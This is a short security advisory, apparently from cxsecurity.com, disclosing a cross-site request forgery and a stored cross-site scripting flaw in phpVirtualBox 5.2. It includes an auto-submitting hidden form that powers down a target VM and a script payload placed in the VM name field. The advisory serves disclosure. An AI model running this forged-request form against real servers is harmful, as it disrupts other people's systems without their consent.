phpVirtualBox 5.2 Cross Site Request Forgery / Cross Site Scripting

2018.05.10
Credit: Codex Lynx
Risk: Low
Local: No
Remote: Yes
CVE: N/A

# Title: phpVirtualBox / CSRF - Stored XSS # Date: 03/04/2018 # Discovered by: @codexlynx # Software Version: <= 5.2 # Category: php, web, csrf, xss [1]CSRF -------------------------------- The backend doesn't validate the origin of the actions. - POC: Shutdown a VM <body onload="document.csrf.submit();"> <form method="post" action="<TARGET>/<PHPVB_PATH>/lib/ajax.php" name="csrf"> <input type="hidden" name="vm" value="<VM_ID>" /> <input type="hidden" name="state" value="powerDown" /> <input type="hidden" name="fn" value="machineSetState" /> </form> </body> [2]Stored XSS -------------------------------- Many fields don't sanitize inputs. This vulnerability could allow a user role escalation in the application. - POC: Insert a persistent script in the vm name field. New (Create Virtual Machine) -> Name: <script>alert(1);</script>Test


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top